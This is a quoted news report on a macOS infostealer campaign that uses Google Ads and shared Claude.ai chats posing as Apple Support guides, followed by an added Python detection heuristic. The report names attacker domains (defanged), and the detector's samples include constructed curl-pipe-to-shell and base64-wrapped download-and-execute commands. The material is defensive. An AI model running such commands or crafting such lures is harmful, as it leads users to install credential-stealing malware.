Hackers Abuse Google Ads and Claude.ai Shared Chats to Distribute macOS Malware
Quote: Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS infostealer malware. The campaign was identified by Berk Albayrak, a security engineer at Trendyol Group, with BleepingComputer independently confirming a second active version using different infrastructure.

Users searching for "Claude mac download" might see sponsored Google search results directing them to Claude.ai, with the URL appearing legitimate. These links lead to publicly shared Claude chats that appear as official "Claude Code on Mac" installation guides supposedly from Apple Support. The chats instruct users to open Terminal and paste a command, which then silently downloads and executes malware.

At the time of reporting, two separate Claude shared chats involved in this attack were accessible publicly, each using different domains and payloads but sharing an identical social engineering approach.

How the Claude.ai Malvertising Attack Works

The command being pasted downloads a shell script that is encoded in base64 from domains controlled by attackers. One version, flagged by BleepingComputer, fetches a script called loader.sh from bernasibutuwqu2[.]com, while another, identified by Albayrak, uses customroofingcontractors[.]com.

This loader runs entirely in memory, which means it leaves minimal traces on the disk. The server delivers a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery. This approach makes signature-based detection much more difficult.
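
Because the payload is re-obfuscated on every request, one detection angle is the shape of the pasted command rather than the bytes it downloads. The following is an added example, not part of the quoted article or the original post: it scores process command lines for a download that is decoded and handed straight to a shell. The patterns, the function names `classify` and `expand_inline_base64`, and the sample command lines are assumptions, since the page does not show the actual command.

```python
import base64
import re

# Heuristics for the command *shape* (assumed; the page does not show the real command).
FETCH = re.compile(r"\b(curl|wget)\b")
DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
# Output handed to an interpreter: piped into a shell, run via -c "$(...)", or eval.
EXEC = re.compile(r"\|\s*(ba|z|k)?sh\b|\b(ba|z|k)?sh\s+-c\s+[\"']?\$\(|\beval\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def expand_inline_base64(cmd: str) -> str:
    """Append decoded inline base64 literals so a command hidden inside
    `echo <blob> | base64 -D | sh` is scanned as well."""
    parts = [cmd]
    for token in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except ValueError:  # bad padding, non-base64, or not UTF-8
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            parts.append(text)
    return "\n".join(parts)


def classify(cmd: str) -> str:
    """Return 'high', 'medium' or 'none' for one process command line."""
    text = expand_inline_base64(cmd)
    hidden = text != cmd  # something readable was wrapped in base64
    fetch, decode, execute = (bool(p.search(text)) for p in (FETCH, DECODE, EXEC))
    if fetch and execute:
        # Download straight into a shell; decoding or wrapping raises confidence.
        return "high" if (decode or hidden) else "medium"
    if decode and execute:
        return "medium"
    return "none"


# Constructed sample command lines (placeholder .invalid hosts, not campaign data).
WRAPPED = base64.b64encode(b"curl -s https://dl.example.invalid/a | sh").decode()
SAMPLES = [
    "curl -fsSL https://dl.example.invalid/loader.sh | base64 -d | bash",
    f"echo {WRAPPED} | base64 -D | zsh",
    "curl -fsSL https://example.invalid/install.sh | sh",
    "curl -LO https://example.invalid/release.tar.gz",
    "echo aGVsbG8gd29ybGQ= | base64 -d",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{classify(line):6}  {line}")
```

A "medium" result also covers legitimate installers that pipe a download into a shell, so it is a prompt for review rather than a verdict.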
